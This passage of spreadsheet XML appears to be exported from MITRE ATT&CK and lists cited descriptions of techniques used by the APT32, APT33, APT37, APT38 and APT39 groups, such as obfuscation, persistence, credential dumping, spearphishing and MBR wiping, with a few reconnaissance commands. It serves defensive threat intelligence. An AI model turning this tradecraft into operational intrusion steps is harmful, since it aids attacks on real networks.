    <t>[APT32](https://attack.mitre.org/groups/G0050) uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. [APT32](https://attack.mitre.org/groups/G0050) has also encoded payloads using Base64 and a framework called "Dont-Kill-My-Cat (DKMC). [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used pass the hash for lateral movement.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) successfully gained remote access by using pass the ticket.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) malware has injected a Cobalt Strike beacon into Rundll32.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can query the Windows Registry to gather system information. (Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) </t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has enumerated DC servers using the command &lt;code&gt;net group "Domain Controllers" /domain&lt;/code&gt;. The group has also used the &lt;code&gt;ping&lt;/code&gt; command.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has moved and renamed pubprn.vbs to a .txt file to avoid detection.(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used [Net](https://attack.mitre.org/software/S0039) to use Windows' hidden network shares to copy their tools to remote machines for execution.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used scheduled tasks to persist on victim systems.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used Windows services as a way to execute its malicious payload. (Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up Facebook pages in tandem with fake websites.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) compromised McAfee ePO to move laterally by distributing malware as a software deployment task.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used malicious links to direct users to web pages designed to harvest credentials.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&amp;C server. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to identify the name of the infected host.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)(Citation: FireEye APT32 April 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;netstat -anpo tcp&lt;/code&gt; command to display TCP connections on the victim's machine.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the &lt;code&gt;whoami&lt;/code&gt; command on the victim's machine. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to collect the username on the victim's machine. (Citation: FireEye APT32 April 2020)(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Cobalt Strike](https://attack.mitre.org/software/S0154), and a variety of other open-source tools from GitHub.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used macros, COM scriptlets, and VBS scripts.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017) </t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used Web shells to maintain access to victim websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used cmd.exe for execution.(Citation: Cybereason Cobalt Kitty 2017) </t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used WMI to deploy their tools on remote machines and to gather information about the Outlook process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) modified Windows Services to ensure PowerShell scripts were loaded on the system. [APT32](https://attack.mitre.org/groups/G0050) also creates a Windows service to establish persistence.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT33](https://attack.mitre.org/groups/G0064) has used WinRAR to compress data prior to exfil.(Citation: Symantec Elfin Mar 2019)	
</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used compromised Office 365 accounts in tandem with [Ruler](https://attack.mitre.org/software/S0358) in an attempt to gain control of endpoints.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used FTP to exfiltrate files (separately from the C2 channel).(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like Gpppassword to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)	
</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349), [Mimikatz](https://attack.mitre.org/software/S0002), and ProcDump to dump credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used malicious e-mail attachments to lure victims into executing malware.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has lured users to click links to malicious HTML applications delivered via spearphishing emails.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used SniffPass to collect credentials by sniffing network traffic.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used HTTP over TCP ports 808 and 880 for command and control.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode payloads.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as [DarkComet](https://attack.mitre.org/software/S0334) to the Startup folder of a victim, and used Registry run keys to gain persistence.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has created a scheduled task to execute a .vbe file multiple times a day.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing e-mails with archive attachments.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing emails containing links to .hta files.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode command and control traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used AES for encryption of command and control traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has obtained and leveraged publicly-available tools for early intrusion activities.(Citation: FireEye APT33 Guardrail)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used valid accounts for initial access and privilege escalation.(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used VBScript to initiate the delivery of payloads.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used HTTP for command and control.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has attempted to use WMI event subscriptions to establish persistence on compromised hosts.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used an audio capturing utility known as SOUNDWAVE that captures microphone input.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Ruby scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has collected data from victims' local systems.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Windows DDE for execution of commands and a malicious VBS.(Citation: Securelist ScarCruft Jun 2016)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has downloaded second stage malware from compromised websites.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid BLUELIGHT August 2021)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”(Citation: Securelist ScarCruft Jun 2016)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has sent spearphishing attachments attempting to get a user to open them.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) obfuscates strings and payloads.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices. (Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067)'s Freenki malware lists running processes using the Microsoft Windows API.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) injects its malware variant, [ROKRAT](https://attack.mitre.org/software/S0240), into the cmd.exe process.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Python scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067)'s has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt;.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has created scheduled tasks to run malicious scripts on a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) delivers malware using spearphishing emails with malicious HWP attachments.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) uses steganography to send images to users that are embedded with shellcode.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) collects the computer name, the BIOS model, and execution path.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) identifies the victim username.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used malware that will issue the command &lt;code&gt;shutdown /r /t 1&lt;/code&gt; to reboot a system after wiping its MBR.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) executes shellcode and a VBA script to decode Base64 strings.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) uses HTTPS to conceal C2 communications.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used the command-line interface.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) clears Window Event logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to collect data from the clipboard.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom secure delete function to make deleted files unrecoverable.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used Hermes ransomware to encrypt files with AES256.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has collected data from a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has conducted watering holes schemes to gain initial access to victims.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) have enumerated files and directories, or searched in specific locations within a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082)  has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) uses a tool called CLEANTOAD that has the capability to modify Registry keys.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT38](https://attack.mitre.org/groups/G0082) has used the Windows API to execute code within a victim's system.(Citation: CISA AA20-239A BeagleBoyz August 2020) </t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has enumerated network shares on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) leveraged Sysmon to understand the processes, services in the organization.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has modified data timestamps to mimic files that are in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has obtained and used open-source tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: ESET Lazarus KillDisk April 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to set &lt;code&gt;LoadAppInit_DLLs&lt;/code&gt; in the Registry key &lt;code&gt;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; in order to establish persistence.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used WinRAR and 7-Zip to compress an archive stolen data.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the BITS protocol to exfiltrate stolen data from a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has communicated with C2 through files uploaded to and downloaded from DropBox.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used Ncrack to reveal credentials.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
